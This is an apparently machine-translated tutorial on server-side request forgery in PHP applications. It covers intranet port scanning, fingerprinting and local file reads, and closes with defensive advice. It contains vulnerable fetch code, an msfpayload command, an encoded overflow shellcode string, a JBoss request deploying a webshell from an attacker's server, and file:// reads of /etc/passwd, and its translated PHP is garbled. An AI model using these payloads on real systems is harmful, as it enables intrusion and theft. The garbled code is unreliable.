Analysis of SSRF attack instances

SSRF attack Overview

Many Web applications provide the ability to retrieve data from other servers. With the URL specified by the user, the Web application can obtain images, download files, and read file content. If this function is maliciously used, you can use a defective web application as a proxy to attack remote and local servers. This type of attack is called server-side request forgery ).

For example, the display is a typical application that provides this function:

If the application does not properly verify and filter the URL provided by the user and the information returned by the remote server, this type of Server Request Forgery may exist. Google, Facebook, Adobe, Baidu, Tencent, and other well-known companies have discovered such vulnerabilities. There are five types of attacks that can be achieved by attackers using SSRF:

1. You can scan the Internet, server Intranet, and local ports to obtain the banner information of some services;

2. Attack applications running on the Intranet or local device (such as overflow );

3. Fingerprint Recognition for Intranet web applications by accessing default files;

4. Attacks against web applications on the Intranet and Internet, mainly attacks that can be implemented using get parameters (such as struts2 and sqli );

5. Use the file protocol to read local files.

Common backend implementation

SSRF attacks may be written in any language. We use some PHP code to analyze them as an example. Most of the Code comes from the real application source code.

1, PHP file_get_contents:

1. <? PHP
2. If (isset ($ _ post ['url'])
3. {
4. $ Content = file_get_contents ($ _ post ['url']);
5. $ Filename = './images/'.rand().'{img1.jpg ';
6. File_put_contents ($ filename, $ content );
7. Echo $ _ post ['url'];
8. $ IMG = " ";
9. }
10. Echo $ IMG;
11. ?>

This Code uses the file_get_contents function to get an image from the URL specified by the user. Save the file name on the hard disk and display it to the user.

2, PHP fsockopen ():

1. <? PHP
2. Function GetFile ($ host, $ port, $ link)
3. {
4. $ Fp = fsockopen ($ host, intval ($ port), $ errno, $ errstr, 30 );
5. If (! $ FP ){
6. Echo "$ errstr (error number $ errno) \ n ";
7. } Else {
8. $ Out = "get $ link HTTP/1.1 \ r \ n ";
9. $ Out. = "Host: $ host \ r \ n ";
10. $ Out. = "connection: Close \ r \ n ";
11. $ Out. = "\ r \ n ";
12. Fwrite ($ FP, $ out );
13. $ Contents = '';
14. While (! Feof ($ FP )){
15. $ Contents. = fgets ($ FP, 1024 );
16. }
17. Fclose ($ FP );
18. Return $ contents;
19. }
20. }
21. ?>

This Code uses the fsockopen function to obtain user-defined URL data (file or HTML ). This function uses Socket to establish a TCP connection with the server to transmit the original data.

3, PHP curl_exec ():

1. <? PHP
2. If (isset ($ _ post ['url'])
3. {
4. $ Link = $ _ post ['url'];
5. $ Curlobj = curl_init ();
6. Curl_setopt ($ curlobj, curlopt_post, 0 );
7. Curl_setopt ($ curlobj, curlopt_url, $ link );
8. Curl_setopt ($ curlobj, curlopt_returntransfer, 1 );
9. $ Result = curl_exec ($ curlobj );
10. Curl_close ($ curlobj );
11.  
12. $ Filename = './curled/'.rand().'.txt ';
13. File_put_contents ($ filename, $ result );
14. Echo $ result;
15. }
16. ?>

This is another common implementation. Use curl to obtain data.

Attack scenarios

In most web server architectures, the web server itself can access the Internet and the Intranet of the server. Shows where requests from the Web server can arrive.

Port Scan

Most social websites provide the ability to upload images through URLs specified by users. If the URL entered by the user is invalid. Most Web applications return error messages. Attackers can enter Some uncommon but valid Uris, such

http://example.com:8080/dir/images/http://example.com:22/dir/public/image.jpghttp://example.com:3306/dir/images/

Then, judge whether the port is open based on the server's return information. Most applications do not determine the port. As long as it is a valid URL, a request is sent. Most TCP services send banner information when establishing a socket connection. The banner information is ASCII encoded and can be displayed as the original HTML data. Of course, the server generally does not directly display the returned information, but different error codes, length of the returned information, and return time can be used as a basis to determine the port status of the remote server.

The following implementation can be used for port scanning:

1. <? PHP
2. If (isset ($ _ post ['url'])
3. {
4. $ Link = $ _ post ['url'];
5. $ Filename = './curled/'. Rand (). 'txt ';
6. $ Curlobj = curl_init ($ link );
7. $ Fp = fopen ($ filename, "W ");
8. Curl_setopt ($ curlobj, curlopt_file, $ FP );
9. Curl_setopt ($ curlobj, curlopt_header, 0 );
10. Curl_exec ($ curlobj );
11. Curl_close ($ curlobj );
12. Fclose ($ FP );
13. $ Fp = fopen ($ filename, "R ");
14. $ Result = fread ($ FP, filesize ($ filename ));
15. Fclose ($ FP );
16. Echo $ result;
17. }
18. ?>

You can use the following form to submit the test (relatively simple ~~) :

1. <HTML> <body>
2. <Form name = "PX" method = "Post" Action = "http: // 127.0.0.1/SS. php">
3. <Input type = "text" name = "url" value = "">
4. <Input type = "Submit" name = "commit" value = "Submit">
5. </Form>
6. <SCRIPT>
7. </SCRIPT>
8. </Body>

Normally, the request http://www.twitter.com/robots.txt returns the following results:

If you request a port that is not an HTTP service, for example, http://scanme.nmap.org: 22/test.txt, the banner information is returned.

The request to close the port will report an error: http://scanme.nmap.org: 25/test.txt

Request the local MySQL port: http: // 127.0.0.1: 3306/test.txt

Of course, most Internet applications do not directly return banner information. However, you can determine the error information, response time, and response package size as mentioned earlier. The following is a case in Google's webmaster application that uses the returned information to determine the port status. This defect has been fixed by Google.

Attack applications

Intranet security is usually weak, overflow, weak passwords, and so on. Through SSRF attacks, you can access the Intranet, attack the Intranet or local machines, and obtain shell.

The following is a local demonstration using a Applet:

Request: http: // 127.0.0.1: 8987/test.txt

Port 8987 is opened.

Request:

Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

This is a white-box analysis. In actual practice, of course, this condition does not apply only to known vulnerabilities. Write exp through analysis. Because HTTP is a text-based protocol, processing Unicode characters that cannot be printed may cause problems. Msfencode is used for encoding. The command is as follows:

msfpayload widnows/exec CMD=calc.exe R | msfencodebufferRegister=ESP -e x86/alpha_mixed

The final payload is as follows:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@‘ßwTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlhhmYUPWpWp3Pk9he01xRSTnkpRfPlKPRtLLKPR24NkbR7XDOMgszuvVQ9oeaKpllgL3QQl5RFLWPiQJodM31JgKRHpaBPWNk3bvpLKsrWLwqZpLK1P0xMU9PSDCz7qZpf0NkQX6xnk2xUps1n3xcgL3yNkednkVayF4qKO5aKpnLIQJo4M31O76XIpbUzTdC3MHxGKamvDbU8bchLKShEtgqhSQvLKtLRkNkShuLgqZslK5TlKVaZpoy3tGTWTqKqKsQ0YSjRqyoKP2xCoSjnkwb8kLFqM0jFaNmLElyc05PC0pPsX6QlK0oOwkOyEOKhph5920VBHY6MEoMOmKON5Uls6SLUZMPykip2UfeoK3wfs422OBJs0Sc9oZuCSPaPl3SC0AA

Overflow successful. The calculator is displayed.

You may have questions about whether HTTP data can be received by other server protocols. You can refer to the Cross-protocol communication technology.

Intranet web application Fingerprint Recognition

Identifying the frameworks, platforms, modules, and CMS used by intranet applications can provide a lot of help for subsequent attacks. Most Web application frameworks have some unique files and directories. You can identify the application type or even the detailed version through these files. Based on this information, attackers can collect targeted vulnerabilities for attacks. For example, you can access the following files to determine whether phpMyAdmin is installed:

Request: http://127.0.0.1:8080/phpMyAdmin/themes/original/img/b_tblimport.pngRequest: http://127.0.0.1:8081/wp-content/themes/default/images/audio.jpgRequest: http://127.0.0.1:8082/profiles/minimal/translations/README.txt

Access http: // 10.0.0.1/portname. js to check whether it is a dlink router.

The following Baidu case is from wooyun and has been fixed. Access http: // 10.50.33.43: 8080/manager/images/atat.gif to identify that Tomcat is used on the server.

Attack Intranet web applications

There are many Web attacks that can only be attacked through the get method, such as struts2 command execution. Here is a JBoss case. You can use a GET request to deploy webshell.

You only need to put the network horse on the internet server and then send this request:

&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://our_public_internet_server/utils/cmd.war

Request the network horse to execute the command: http: // 127.0.0.1: 8080/CMD/shell. jsp? X = dir

In practice, there is usually no echo, similar to blind playing.

Read local files

The above cases are based on HTTP requests. If we specify the file protocol, we may also read files on the server. The following request causes the application to read local files:

Request: file: // C:/Windows/win. ini

The following is an Adobe case that has been fixed. The request is file: // etc/passwd.

How to defend

There are usually five ideas:

1. It is easier to filter the returned information and verify the remote server's response to the request. If a web application obtains a certain type of file. Verify that the returned information meets the criteria before presenting the returned results to the user.

2. Unify the error information to prevent users from judging the port status of the remote server based on the error information.

3. Restrict the request port to a common http port, for example, 80,443,808.

4. Blacklist Intranet IP addresses. Prevent applications from being used to obtain intranet data and attack the Intranet.

5. disable unnecessary protocols. Only HTTP and HTTPS requests are allowed. It can prevent problems such as file: //, gopher: //, and FTP.

References

Http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-3.html

Http://evilcos.me /? P = 2

Http://www.wooyun.org

Via riyazwalikar.com

Address: http://netsecurity.51cto.com/art/201312/424038_all.htm

Analysis of SSRF attack instances